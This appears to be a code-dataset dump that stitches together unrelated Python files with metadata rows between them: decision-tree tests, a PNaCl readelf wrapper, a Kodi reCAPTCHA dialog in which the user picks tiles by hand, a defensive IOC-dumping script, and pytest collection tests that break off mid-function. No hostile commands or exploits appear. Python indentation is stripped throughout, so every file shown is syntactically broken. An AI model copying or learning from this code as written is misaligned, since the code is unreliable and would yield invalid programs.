tree = Tree(rdata3, metric=VARIANCE2)
for row in rdata3:
tree.train(row)
node = tree._tree
self.assertEqual(set(node.attributes), set(['a', 'b', 'c', 'd']))
attr_gains = [(node.get_gain(attr_name), attr_name) for attr_name in node.attributes]
attr_gains.sort()
# With entropy metric 2, attributes that have fewer unique values
# will have a slightly greater gain relative to attributes with more
# unique values.
self.assertEqual([v for _, v in attr_gains], ['d', 'c', 'b', 'a'])
# Incrementally grow a classification tree.
print("-"*80)
print("Incrementally growing classification tree...")
tree = Tree(cdata5, metric=ENTROPY2, splitting_n=17, auto_grow=True)
for row in cdata5:
tree.train(row)
acc = tree.test(cdata5)
print('Initial accuracy:', acc.mean)
self.assertEqual(acc.mean, 0.25)
# Update tree several times to give leaf nodes potential time to split.
for _ in range(5):
for row in cdata5:
#print(row
tree.train(row)
acc = tree.test(cdata5)
print('Accuracy:', acc.mean)
print('Final tree:')
pprint(tree.to_dict(), indent=4)
# Confirm no more nodes have split, since the optimal split has
# already been found and the tree is fully grown.
self.assertEqual(tree['b'][1].ready_to_split, False)
self.assertEqual(tree['b'][1]._branches, {})
# Test accuracy of fully grown tree.
acc = tree.test(cdata5)
self.assertEqual(acc.mean, 1.0)
# Incrementally grow a regression tree.
print("-"*80)
print("Incrementally growing regression tree...")
tree = Tree(rdata3, metric=VARIANCE2, splitting_n=17, auto_grow=True, leaf_threshold=0.0)
for row in rdata3:
tree.train(row)
mae = tree.test(rdata3)
print('Initial MAE:', mae.mean)
self.assertAlmostEqual(mae.mean, 0.4, 5)
for _ in range(20):
for row in rdata3:
tree.train(row)
mae = tree.test(rdata3)
print('MAE:', mae.mean)
print("Final tree:")
pprint(tree.to_dict(), indent=4)
self.assertEqual(mae.mean, 0.0)
print('Done.')
def test_forest(self):
print('Testing forest...')
print('Growing forest incrementally...')
cdata2 = Data('cdata2')
cdata2_lst = list(cdata2)
# Incrementally train and test the forest on the same data.
forest = Forest(
data=cdata2,
size=10, # Grow 10 trees.
sample_ratio=0.8, # Train each tree on 80% of all records.
grow_method=GROW_AUTO_INCREMENTAL, # Incrementally grow each tree.
weighting_method=Forest.mean_oob_mae_weight,
tree_kwargs=dict(metric=ENTROPY2),
)
mae = None
for _ in range(10):
for row in cdata2_lst:
forest.train(row)
mae = forest.test(cdata2_lst)
print('Forest MAE:', mae.mean)
self.assertEqual(mae.mean, 1.0)
trees = list(forest.trees)
trees.sort(key=lambda t: t.out_of_bag_mae.mean)
print('Best tree:')
pprint(trees[-1].to_dict(), indent=4)
self.assertEqual(trees[-1].auto_grow, True)
print('Done.')
def test_milksets(self):
try:
from milksets import wine, yeast # pylint: disable=import-outside-toplevel
except ImportError:
print('Skipping milkset tests because milksets is not installed.')
print('Run `sudo pip install milksets` and rerun these tests.')
return
def leave_one_out(all_data, metric=None):
test_data, train_data = all_data.split(leave_one_out=True)
tree = Tree.build(train_data, metric=metric)
tree.set_missing_value_policy(USE_NEAREST)
result = tree.test(test_data)
return result.mean
def cross_validate(all_data, epoches=10, test_ratio=0.25, metric=None):
accuracies = []
for epoche in range(epoches):
test_data, train_data = all_data.split(ratio=test_ratio)
tree = Tree.build(train_data, metric=metric)
tree.set_missing_value_policy(USE_NEAREST)
result = tree.test(test_data)
accuracies.append(result.mean)
return sum(accuracies)/float(len(accuracies))
# Load wine dataset.
# Each record has 13 continuous features
# and one discrete class containing 2 unique values.
print('Loading UCI wine data...')
wine_data = Data(
[list(a)+[b] for a, b in zip(*wine.load())],
order=map(str, range(13))+['cls'],
types=[CON]*13 + [DIS],
modes=dict(cls=CLS))
self.assertEqual(len(wine_data), 178)
self.assertEqual(len(list(wine_data)), 178)
# Load yeast dataset.
# Each record has 8 continuous features
# and one discrete class containing 10 values.
print('Loading UCI yeast data...')
yeast_data = Data(
[list(a)+[b] for a, b in zip(*yeast.load())],
order=map(str, range(8))+['cls'],
types=[CON]*8 + [DIS],
modes=dict(cls=CLS))
self.assertEqual(len(yeast_data), 1484)
self.assertEqual(len(list(yeast_data)), 1484)
acc = leave_one_out(wine_data, metric=ENTROPY1)
print('Wine leave-one-out accuracy: %0.2f' % (acc,))
acc = cross_validate(wine_data, metric=ENTROPY1, test_ratio=0.01, epoches=25)
print('Wine cross-validated accuracy: %0.2f' % (acc,))
acc = leave_one_out(yeast_data, metric=ENTROPY1)
print('Yeast leave-one-out accuracy: %0.2f' % (acc,))
acc = cross_validate(yeast_data, metric=ENTROPY1, test_ratio=0.005, epoches=25)
print('Yeast cross-validated accuracy: %0.2f' % (acc,))
def test_entropy(self):
# Lopsided distribution with mostly all events in one group
# is low entropy.
self.assertAlmostEqual(entropy({+1:10, -1:10, 0:980}), 0.1018576)
# Everything in one group is 0 entropy.
self.assertAlmostEqual(entropy({0:1000}), 0.0)
# Everything equally divided is highest entropy.
self.assertAlmostEqual(entropy({+1:500, -1:500}), 1.0)
data1 = {+1:1, -1:1}#,0:200-2}
data2 = {+1:100, -1:100}
# Entropy1 doesn't care about size.
e11 = entropy(data1, method=ENTROPY1)
e21 = entropy(data2, method=ENTROPY1)
self.assertEqual(e11, 1.0)
self.assertEqual(e11, e21)
# Entropy2 takes size into account.
e12 = entropy(data1, method=ENTROPY2)
e22 = entropy(data2, method=ENTROPY2)
self.assertEqual(e12, 0.5)
self.assertEqual(e22, 0.995)
# Entropy3 takes large numbers of values into account, but otherwise ignores size.
e13 = entropy(data1, method=ENTROPY3)
e23 = entropy(data2, method=ENTROPY3)
self.assertEqual(e13, -49.0)
self.assertEqual(e23, 0.5)
if __name__ == '__main__':
unittest.main()
| lgpl-3.0 | 1,056,484,484,026,937,900 | 34.088957 | 158 | 0.57929 | false |
endlessm/chromium-browser | native_client/pnacl/driver/pnacl-readelf.py | 2 | 3751 | #!/usr/bin/python
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from driver_env import env
from driver_log import Log
import driver_tools
import filetype
EXTRA_ENV = {
'INPUTS': '',
'FLAGS': '',
}
PATTERNS = [
( '(-.*)', "env.append('FLAGS', $0)"),
( '(.*)', "env.append('INPUTS', pathtools.normalize($0))"),
]
def main(argv):
env.update(EXTRA_ENV)
driver_tools.ParseArgs(argv, PATTERNS)
inputs = env.get('INPUTS')
if len(inputs) == 0:
Log.Fatal("No input files given")
for infile in inputs:
driver_tools.CheckPathLength(infile)
env.push()
env.set('input', infile)
if filetype.IsLLVMBitcode(infile):
# Hack to support newlib build.
# Newlib determines whether the toolchain supports .init_array, etc., by
# compiling a small test and looking for a specific section tidbit using
# "readelf -S". Since pnacl compiles to bitcode, readelf isn't available.
# (there is a line: "if ${READELF} -S conftest | grep -e INIT_ARRAY"
# in newlib's configure file).
# TODO(sehr): we may want to implement a whole readelf on bitcode.
flags = env.get('FLAGS')
if len(flags) == 1 and flags[0] == '-S':
print('INIT_ARRAY')
return 0
Log.Fatal('Cannot handle pnacl-readelf %s' % str(argv))
return 1
driver_tools.Run('"${READELF}" ${FLAGS} ${input}')
env.pop()
# only reached in case of no errors
return 0
def get_help(unused_argv):
return """
Usage: %s <option(s)> elf-file(s)
Display information about the contents of ELF format files
Options are:
-a --all Equivalent to: -h -l -S -s -r -d -V -A -I
-h --file-header Display the ELF file header
-l --program-headers Display the program headers
--segments An alias for --program-headers
-S --section-headers Display the sections' header
--sections An alias for --section-headers
-g --section-groups Display the section groups
-t --section-details Display the section details
-e --headers Equivalent to: -h -l -S
-s --syms Display the symbol table
--symbols An alias for --syms
-n --notes Display the core notes (if present)
-r --relocs Display the relocations (if present)
-u --unwind Display the unwind info (if present)
-d --dynamic Display the dynamic section (if present)
-V --version-info Display the version sections (if present)
-A --arch-specific Display architecture specific information (if any).
-c --archive-index Display the symbol/file index in an archive
-D --use-dynamic Use the dynamic section info when displaying symbols
-x --hex-dump=<number|name>
Dump the contents of section <number|name> as bytes
-p --string-dump=<number|name>
Dump the contents of section <number|name> as strings
-R --relocated-dump=<number|name>
Dump the contents of section <number|name> as relocated bytes
-w[lLiaprmfFsoR] or
--debug-dump[=rawline,=decodedline,=info,=abbrev,=pubnames,=aranges,=macro,=frames,=str,=loc,=Ranges]
Display the contents of DWARF2 debug sections
-I --histogram Display histogram of bucket list lengths
-W --wide Allow output width to exceed 80 characters
@<file> Read options from <file>
-H --help Display this information
-v --version Display the version number of readelf
""" % env.getone('SCRIPT_NAME')
| bsd-3-clause | 4,530,193,218,533,686,300 | 39.333333 | 103 | 0.628099 | false |
kreatorkodi/repository.torrentbr | script.module.urlresolver/lib/urlresolver/plugins/lib/recaptcha_v2.py | 1 | 7299 | # -*- coding: utf-8 -*-
"""
urlresolver XBMC Addon
Copyright (C) 2016 tknorris
Derived from Shani's LPro Code (https://github.com/Shani-08/ShaniXBMCWork2/blob/master/plugin.video.live.streamspro/unCaptcha.py)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
reusable captcha methods
"""
import re
import os
import xbmcgui
from urlresolver import common
class cInputWindow(xbmcgui.WindowDialog):
def __init__(self, *args, **kwargs):
bg_image = os.path.join(common.addon_path, 'resources', 'images', 'DialogBack2.png')
check_image = os.path.join(common.addon_path, 'resources', 'images', 'checked.png')
button_fo = os.path.join(common.kodi.get_path(), 'resources', 'skins', 'Default', 'media', 'button-fo.png')
button_nofo = os.path.join(common.kodi.get_path(), 'resources', 'skins', 'Default', 'media', 'button-nofo.png')
self.cancelled = False
self.chk = [0] * 9
self.chkbutton = [0] * 9
self.chkstate = [False] * 9
imgX, imgY, imgw, imgh = 436, 210, 408, 300
ph, pw = imgh / 3, imgw / 3
x_gap = 70
y_gap = 70
button_gap = 40
button_h = 40
button_y = imgY + imgh + button_gap
middle = imgX + (imgw / 2)
win_x = imgX - x_gap
win_y = imgY - y_gap
win_h = imgh + 2 * y_gap + button_h + button_gap
win_w = imgw + 2 * x_gap
ctrlBackgound = xbmcgui.ControlImage(win_x, win_y, win_w, win_h, bg_image)
self.addControl(ctrlBackgound)
self.msg = '[COLOR red]%s[/COLOR]' % (kwargs.get('msg'))
self.strActionInfo = xbmcgui.ControlLabel(imgX, imgY - 30, imgw, 20, self.msg, 'font13')
self.addControl(self.strActionInfo)
img = xbmcgui.ControlImage(imgX, imgY, imgw, imgh, kwargs.get('captcha'))
self.addControl(img)
self.iteration = kwargs.get('iteration')
self.strActionInfo = xbmcgui.ControlLabel(imgX, imgY + imgh, imgw, 20, common.i18n('captcha_round') % (str(self.iteration)), 'font40')
self.addControl(self.strActionInfo)
self.cancelbutton = xbmcgui.ControlButton(middle - 110, button_y, 100, button_h, common.i18n('cancel'), focusTexture=button_fo, noFocusTexture=button_nofo, alignment=2)
self.okbutton = xbmcgui.ControlButton(middle + 10, button_y, 100, button_h, common.i18n('ok'), focusTexture=button_fo, noFocusTexture=button_nofo, alignment=2)
self.addControl(self.okbutton)
self.addControl(self.cancelbutton)
for i in xrange(9):
row = i / 3
col = i % 3
x_pos = imgX + (pw * col)
y_pos = imgY + (ph * row)
self.chk[i] = xbmcgui.ControlImage(x_pos, y_pos, pw, ph, check_image)
self.addControl(self.chk[i])
self.chk[i].setVisible(False)
self.chkbutton[i] = xbmcgui.ControlButton(x_pos, y_pos, pw, ph, str(i + 1), font='font1', focusTexture=button_fo, noFocusTexture=button_nofo)
self.addControl(self.chkbutton[i])
for i in xrange(9):
row_start = (i / 3) * 3
right = row_start + (i + 1) % 3
left = row_start + (i - 1) % 3
up = (i - 3) % 9
down = (i + 3) % 9
self.chkbutton[i].controlRight(self.chkbutton[right])
self.chkbutton[i].controlLeft(self.chkbutton[left])
if i <= 2:
self.chkbutton[i].controlUp(self.okbutton)
else:
self.chkbutton[i].controlUp(self.chkbutton[up])
if i >= 6:
self.chkbutton[i].controlDown(self.okbutton)
else:
self.chkbutton[i].controlDown(self.chkbutton[down])
self.okbutton.controlLeft(self.cancelbutton)
self.okbutton.controlRight(self.cancelbutton)
self.cancelbutton.controlLeft(self.okbutton)
self.cancelbutton.controlRight(self.okbutton)
self.okbutton.controlDown(self.chkbutton[2])
self.okbutton.controlUp(self.chkbutton[8])
self.cancelbutton.controlDown(self.chkbutton[0])
self.cancelbutton.controlUp(self.chkbutton[6])
self.setFocus(self.okbutton)
def get(self):
self.doModal()
self.close()
if not self.cancelled:
return [i for i in xrange(9) if self.chkstate[i]]
def onControl(self, control):
if control == self.okbutton and any(self.chkstate):
self.close()
elif control == self.cancelbutton:
self.cancelled = True
self.close()
else:
label = control.getLabel()
if label.isnumeric():
index = int(label) - 1
self.chkstate[index] = not self.chkstate[index]
self.chk[index].setVisible(self.chkstate[index])
def onAction(self, action):
if action == 10:
self.cancelled = True
self.close()
class UnCaptchaReCaptcha:
net = common.Net()
def processCaptcha(self, key, lang):
headers = {'Referer': 'https://www.google.com/recaptcha/api2/demo', 'Accept-Language': lang}
html = self.net.http_GET('http://www.google.com/recaptcha/api/fallback?k=%s' % (key), headers=headers).content
token = ''
iteration = 0
while True:
payload = re.findall('"(/recaptcha/api2/payload[^"]+)', html)
iteration += 1
message = re.findall('<label[^>]+class="fbc-imageselect-message-text"[^>]*>(.*?)</label>', html)
if not message:
message = re.findall('<div[^>]+class="fbc-imageselect-message-error">(.*?)</div>', html)
if not message:
token = re.findall('"this\.select\(\)">(.*?)</textarea>', html)[0]
if token:
common.log_utils.log_debug('Captcha Success: %s' % (token))
else:
common.log_utils.log_debug('Captcha Failed: %s')
break
else:
message = message[0]
payload = payload[0]
cval = re.findall('name="c"\s+value="([^"]+)', html)[0]
captcha_imgurl = 'https://www.google.com%s' % (payload.replace('&', '&'))
message = re.sub('</?strong>', '', message)
oSolver = cInputWindow(captcha=captcha_imgurl, msg=message, iteration=iteration)
captcha_response = oSolver.get()
if not captcha_response:
break
data = {'c': cval, 'response': captcha_response}
html = self.net.http_POST("http://www.google.com/recaptcha/api/fallback?k=%s" % (key), form_data=data, headers=headers).content
return token
| gpl-2.0 | -6,874,958,783,085,708,000 | 42.96988 | 176 | 0.590218 | false |
mandiant/ioc_writer | ioc_writer/scripts/iocdump.py | 1 | 2104 | # iocdump.py
#
# Copyright 2016 FireEye
# Licensed under the Apache 2.0 license. Developed for Mandiant by William
# Gibb.
#
# Mandiant licenses this file to you under the Apache License, Version
# 2.0 (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
# Allows for the upgrade of OpenIOC 1.0 IOCs to OpenIOC 1.1 format
#
# Stdlib
from __future__ import print_function
import argparse
import logging
import os
import sys
# Third Party code
# Custom Code
from ..managers import IOCManager
log = logging.getLogger(__name__)
def main(options):
if not options.verbose:
logging.disable(logging.DEBUG)
iocm = IOCManager()
for i in options.input:
iocm.insert(i)
for ioc_obj in iocm.iocs.values():
if options.hide_params:
ioc_obj.display_params = False
print(ioc_obj)
def makeargpaser():
parser = argparse.ArgumentParser(description="Display a textual representation of an IOC or directory of IOCs")
parser.add_argument('input', type=str, nargs='+',
help='Input files or folders')
parser.add_argument('-n', '--no-params', dest='hide_params', default=False, action='store_true',
help='Do not display parameters attached to an IOC.')
parser.add_argument('-v', '--verbose', dest='verbose', default=False, action='store_true',
help='Enable verbose output')
return parser
def _main():
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s [%(filename)s:%(funcName)s]')
p = makeargpaser()
opts = p.parse_args()
main(opts)
if __name__ == '__main__':
_main() | apache-2.0 | -8,542,234,613,581,370,000 | 32.951613 | 120 | 0.678232 | false |
txomon/pytest | testing/python/collect.py | 1 | 53514 | # -*- coding: utf-8 -*-
import os
import sys
import textwrap
import _pytest._code
import pytest
from _pytest.main import EXIT_NOTESTSCOLLECTED
from _pytest.nodes import Collector
from _pytest.warnings import SHOW_PYTEST_WARNINGS_ARG
class TestModule(object):
def test_failing_import(self, testdir):
modcol = testdir.getmodulecol("import alksdjalskdjalkjals")
pytest.raises(Collector.CollectError, modcol.collect)
def test_import_duplicate(self, testdir):
a = testdir.mkdir("a")
b = testdir.mkdir("b")
p = a.ensure("test_whatever.py")
p.pyimport()
del sys.modules["test_whatever"]
b.ensure("test_whatever.py")
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*import*mismatch*",
"*imported*test_whatever*",
"*%s*" % a.join("test_whatever.py"),
"*not the same*",
"*%s*" % b.join("test_whatever.py"),
"*HINT*",
]
)
def test_import_prepend_append(self, testdir, monkeypatch):
syspath = list(sys.path)
monkeypatch.setattr(sys, "path", syspath)
root1 = testdir.mkdir("root1")
root2 = testdir.mkdir("root2")
root1.ensure("x456.py")
root2.ensure("x456.py")
p = root2.join("test_x456.py")
monkeypatch.syspath_prepend(str(root1))
p.write(
textwrap.dedent(
"""\
import x456
def test():
assert x456.__file__.startswith({!r})
""".format(
str(root2)
)
)
)
with root2.as_cwd():
reprec = testdir.inline_run("--import-mode=append")
reprec.assertoutcome(passed=0, failed=1)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_syntax_error_in_module(self, testdir):
modcol = testdir.getmodulecol("this is a syntax error")
pytest.raises(modcol.CollectError, modcol.collect)
pytest.raises(modcol.CollectError, modcol.collect)
def test_module_considers_pluginmanager_at_import(self, testdir):
modcol = testdir.getmodulecol("pytest_plugins='xasdlkj',")
pytest.raises(ImportError, lambda: modcol.obj)
def test_invalid_test_module_name(self, testdir):
a = testdir.mkdir("a")
a.ensure("test_one.part1.py")
result = testdir.runpytest("-rw")
result.stdout.fnmatch_lines(
[
"ImportError while importing test module*test_one.part1*",
"Hint: make sure your test modules/packages have valid Python names.",
]
)
@pytest.mark.parametrize("verbose", [0, 1, 2])
def test_show_traceback_import_error(self, testdir, verbose):
"""Import errors when collecting modules should display the traceback (#1976).
With low verbosity we omit pytest and internal modules, otherwise show all traceback entries.
"""
testdir.makepyfile(
foo_traceback_import_error="""
from bar_traceback_import_error import NOT_AVAILABLE
""",
bar_traceback_import_error="",
)
testdir.makepyfile(
"""
import foo_traceback_import_error
"""
)
args = ("-v",) * verbose
result = testdir.runpytest(*args)
result.stdout.fnmatch_lines(
[
"ImportError while importing test module*",
"Traceback:",
"*from bar_traceback_import_error import NOT_AVAILABLE",
"*cannot import name *NOT_AVAILABLE*",
]
)
assert result.ret == 2
stdout = result.stdout.str()
for name in ("_pytest", os.path.join("py", "_path")):
if verbose == 2:
assert name in stdout
else:
assert name not in stdout
def test_show_traceback_import_error_unicode(self, testdir):
"""Check test modules collected which raise ImportError with unicode messages
are handled properly (#2336).
"""
testdir.makepyfile(
u"""
# -*- coding: utf-8 -*-
raise ImportError(u'Something bad happened ☺')
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"ImportError while importing test module*",
"Traceback:",
"*raise ImportError*Something bad happened*",
]
)
assert result.ret == 2
class TestClass(object):
def test_class_with_init_warning(self, testdir):
testdir.makepyfile(
"""
class TestClass1(object):
def __init__(self):
pass
"""
)
result = testdir.runpytest("-rw")
result.stdout.fnmatch_lines(
[
"*cannot collect test class 'TestClass1' because it has a __init__ constructor"
]
)
def test_class_subclassobject(self, testdir):
testdir.getmodulecol(
"""
class test(object):
pass
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*collected 0*"])
def test_static_method(self, testdir):
"""Support for collecting staticmethod tests (#2528, #2699)"""
testdir.getmodulecol(
"""
import pytest
class Test(object):
@staticmethod
def test_something():
pass
@pytest.fixture
def fix(self):
return 1
@staticmethod
def test_fix(fix):
assert fix == 1
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*collected 2 items*", "*2 passed in*"])
def test_setup_teardown_class_as_classmethod(self, testdir):
testdir.makepyfile(
test_mod1="""
class TestClassMethod(object):
@classmethod
def setup_class(cls):
pass
def test_1(self):
pass
@classmethod
def teardown_class(cls):
pass
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(["*1 passed*"])
def test_issue1035_obj_has_getattr(self, testdir):
modcol = testdir.getmodulecol(
"""
class Chameleon(object):
def __getattr__(self, name):
return True
chameleon = Chameleon()
"""
)
colitems = modcol.collect()
assert len(colitems) == 0
def test_issue1579_namedtuple(self, testdir):
testdir.makepyfile(
"""
import collections
TestCase = collections.namedtuple('TestCase', ['a'])
"""
)
result = testdir.runpytest("-rw")
result.stdout.fnmatch_lines(
"*cannot collect test class 'TestCase' "
"because it has a __new__ constructor*"
)
def test_issue2234_property(self, testdir):
testdir.makepyfile(
"""
class TestCase(object):
@property
def prop(self):
raise NotImplementedError()
"""
)
result = testdir.runpytest()
assert result.ret == EXIT_NOTESTSCOLLECTED
@pytest.mark.filterwarnings(
"ignore:usage of Generator.Function is deprecated, please use pytest.Function instead"
)
class TestGenerator(object):
def test_generative_functions(self, testdir):
modcol = testdir.getmodulecol(
"""
def func1(arg, arg2):
assert arg == arg2
def test_gen():
yield func1, 17, 3*5
yield func1, 42, 6*7
"""
)
colitems = modcol.collect()
assert len(colitems) == 1
gencol = colitems[0]
assert isinstance(gencol, pytest.Generator)
gencolitems = gencol.collect()
assert len(gencolitems) == 2
assert isinstance(gencolitems[0], pytest.Function)
assert isinstance(gencolitems[1], pytest.Function)
assert gencolitems[0].name == "[0]"
assert gencolitems[0].obj.__name__ == "func1"
def test_generative_methods(self, testdir):
modcol = testdir.getmodulecol(
"""
def func1(arg, arg2):
assert arg == arg2
class TestGenMethods(object):
def test_gen(self):
yield func1, 17, 3*5
yield func1, 42, 6*7
"""
)
gencol = modcol.collect()[0].collect()[0].collect()[0]
assert isinstance(gencol, pytest.Generator)
gencolitems = gencol.collect()
assert len(gencolitems) == 2
assert isinstance(gencolitems[0], pytest.Function)
assert isinstance(gencolitems[1], pytest.Function)
assert gencolitems[0].name == "[0]"
assert gencolitems[0].obj.__name__ == "func1"
def test_generative_functions_with_explicit_names(self, testdir):
modcol = testdir.getmodulecol(
"""
def func1(arg, arg2):
assert arg == arg2
def test_gen():
yield "seventeen", func1, 17, 3*5
yield "fortytwo", func1, 42, 6*7
"""
)
colitems = modcol.collect()
assert len(colitems) == 1
gencol = colitems[0]
assert isinstance(gencol, pytest.Generator)
gencolitems = gencol.collect()
assert len(gencolitems) == 2
assert isinstance(gencolitems[0], pytest.Function)
assert isinstance(gencolitems[1], pytest.Function)
assert gencolitems[0].name == "['seventeen']"
assert gencolitems[0].obj.__name__ == "func1"
assert gencolitems[1].name == "['fortytwo']"
assert gencolitems[1].obj.__name__ == "func1"
def test_generative_functions_unique_explicit_names(self, testdir):
# generative
modcol = testdir.getmodulecol(
"""
def func(): pass
def test_gen():
yield "name", func
yield "name", func
"""
)
colitems = modcol.collect()
assert len(colitems) == 1
gencol = colitems[0]
assert isinstance(gencol, pytest.Generator)
pytest.raises(ValueError, "gencol.collect()")
def test_generative_methods_with_explicit_names(self, testdir):
modcol = testdir.getmodulecol(
"""
def func1(arg, arg2):
assert arg == arg2
class TestGenMethods(object):
def test_gen(self):
yield "m1", func1, 17, 3*5
yield "m2", func1, 42, 6*7
"""
)
gencol = modcol.collect()[0].collect()[0].collect()[0]
assert isinstance(gencol, pytest.Generator)
gencolitems = gencol.collect()
assert len(gencolitems) == 2
assert isinstance(gencolitems[0], pytest.Function)
assert isinstance(gencolitems[1], pytest.Function)
assert gencolitems[0].name == "['m1']"
assert gencolitems[0].obj.__name__ == "func1"
assert gencolitems[1].name == "['m2']"
assert gencolitems[1].obj.__name__ == "func1"
def test_order_of_execution_generator_same_codeline(self, testdir, tmpdir):
o = testdir.makepyfile(
"""
from __future__ import print_function
def test_generative_order_of_execution():
import py, pytest
test_list = []
expected_list = list(range(6))
def list_append(item):
test_list.append(item)
def assert_order_of_execution():
print('expected order', expected_list)
print('but got ', test_list)
assert test_list == expected_list
for i in expected_list:
yield list_append, i
yield assert_order_of_execution
"""
)
reprec = testdir.inline_run(o, SHOW_PYTEST_WARNINGS_ARG)
passed, skipped, failed = reprec.countoutcomes()
assert passed == 7
assert not skipped and not failed
def test_order_of_execution_generator_different_codeline(self, testdir):
o = testdir.makepyfile(
"""
from __future__ import print_function
def test_generative_tests_different_codeline():
import py, pytest
test_list = []
expected_list = list(range(3))
def list_append_2():
test_list.append(2)
def list_append_1():
test_list.append(1)
def list_append_0():
test_list.append(0)
def assert_order_of_execution():
print('expected order', expected_list)
print('but got ', test_list)
assert test_list == expected_list
yield list_append_0
yield list_append_1
yield list_append_2
yield assert_order_of_execution
"""
)
reprec = testdir.inline_run(o, SHOW_PYTEST_WARNINGS_ARG)
passed, skipped, failed = reprec.countoutcomes()
assert passed == 4
assert not skipped and not failed
def test_setupstate_is_preserved_134(self, testdir):
# yield-based tests are messy wrt to setupstate because
# during collection they already invoke setup functions
# and then again when they are run. For now, we want to make sure
# that the old 1.3.4 behaviour is preserved such that all
# yielded functions all share the same "self" instance that
# has been used during collection.
o = testdir.makepyfile(
"""
setuplist = []
class TestClass(object):
def setup_method(self, func):
#print "setup_method", self, func
setuplist.append(self)
self.init = 42
def teardown_method(self, func):
self.init = None
def test_func1(self):
pass
def test_func2(self):
yield self.func2
yield self.func2
def func2(self):
assert self.init
def test_setuplist():
# once for test_func2 during collection
# once for test_func1 during test run
# once for test_func2 during test run
#print setuplist
assert len(setuplist) == 3, len(setuplist)
assert setuplist[0] == setuplist[2], setuplist
assert setuplist[1] != setuplist[2], setuplist
"""
)
reprec = testdir.inline_run(o, "-v", SHOW_PYTEST_WARNINGS_ARG)
passed, skipped, failed = reprec.countoutcomes()
assert passed == 4
assert not skipped and not failed
class TestFunction(object):
@pytest.fixture
def ignore_parametrized_marks_args(self):
"""Provides arguments to pytester.runpytest() to ignore the warning about marks being applied directly
to parameters.
"""
return ("-W", "ignore:Applying marks directly to parameters")
def test_getmodulecollector(self, testdir):
item = testdir.getitem("def test_func(): pass")
modcol = item.getparent(pytest.Module)
assert isinstance(modcol, pytest.Module)
assert hasattr(modcol.obj, "test_func")
@pytest.mark.filterwarnings("default")
def test_function_as_object_instance_ignored(self, testdir):
testdir.makepyfile(
"""
class A(object):
def __call__(self, tmpdir):
0/0
test_a = A()
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"collected 0 items",
"*test_function_as_object_instance_ignored.py:2: "
"*cannot collect 'test_a' because it is not a function.",
]
)
def test_function_equality(self, testdir, tmpdir):
from _pytest.fixtures import FixtureManager
config = testdir.parseconfigure()
session = testdir.Session(config)
session._fixturemanager = FixtureManager(session)
def func1():
pass
def func2():
pass
f1 = pytest.Function(
name="name", parent=session, config=config, args=(1,), callobj=func1
)
assert f1 == f1
f2 = pytest.Function(name="name", config=config, callobj=func2, parent=session)
assert f1 != f2
def test_issue197_parametrize_emptyset(self, testdir):
testdir.makepyfile(
"""
import pytest
@pytest.mark.parametrize('arg', [])
def test_function(arg):
pass
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(skipped=1)
def test_single_tuple_unwraps_values(self, testdir):
testdir.makepyfile(
"""
import pytest
@pytest.mark.parametrize(('arg',), [(1,)])
def test_function(arg):
assert arg == 1
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_issue213_parametrize_value_no_equal(self, testdir):
testdir.makepyfile(
"""
import pytest
class A(object):
def __eq__(self, other):
raise ValueError("not possible")
@pytest.mark.parametrize('arg', [A()])
def test_function(arg):
assert arg.__class__.__name__ == "A"
"""
)
reprec = testdir.inline_run("--fulltrace")
reprec.assertoutcome(passed=1)
def test_parametrize_with_non_hashable_values(self, testdir):
"""Test parametrization with non-hashable values."""
testdir.makepyfile(
"""
archival_mapping = {
'1.0': {'tag': '1.0'},
'1.2.2a1': {'tag': 'release-1.2.2a1'},
}
import pytest
@pytest.mark.parametrize('key value'.split(),
archival_mapping.items())
def test_archival_to_version(key, value):
assert key in archival_mapping
assert value == archival_mapping[key]
"""
)
rec = testdir.inline_run()
rec.assertoutcome(passed=2)
def test_parametrize_with_non_hashable_values_indirect(self, testdir):
"""Test parametrization with non-hashable values with indirect parametrization."""
testdir.makepyfile(
"""
archival_mapping = {
'1.0': {'tag': '1.0'},
'1.2.2a1': {'tag': 'release-1.2.2a1'},
}
import pytest
@pytest.fixture
def key(request):
return request.param
@pytest.fixture
def value(request):
return request.param
@pytest.mark.parametrize('key value'.split(),
archival_mapping.items(), indirect=True)
def test_archival_to_version(key, value):
assert key in archival_mapping
assert value == archival_mapping[key]
"""
)
rec = testdir.inline_run()
rec.assertoutcome(passed=2)
def test_parametrize_overrides_fixture(self, testdir):
"""Test parametrization when parameter overrides existing fixture with same name."""
testdir.makepyfile(
"""
import pytest
@pytest.fixture
def value():
return 'value'
@pytest.mark.parametrize('value',
['overridden'])
def test_overridden_via_param(value):
assert value == 'overridden'
@pytest.mark.parametrize('somevalue', ['overridden'])
def test_not_overridden(value, somevalue):
assert value == 'value'
assert somevalue == 'overridden'
@pytest.mark.parametrize('other,value', [('foo', 'overridden')])
def test_overridden_via_multiparam(other, value):
assert other == 'foo'
assert value == 'overridden'
"""
)
rec = testdir.inline_run()
rec.assertoutcome(passed=3)
def test_parametrize_overrides_parametrized_fixture(self, testdir):
"""Test parametrization when parameter overrides existing parametrized fixture with same name."""
testdir.makepyfile(
"""
import pytest
@pytest.fixture(params=[1, 2])
def value(request):
return request.param
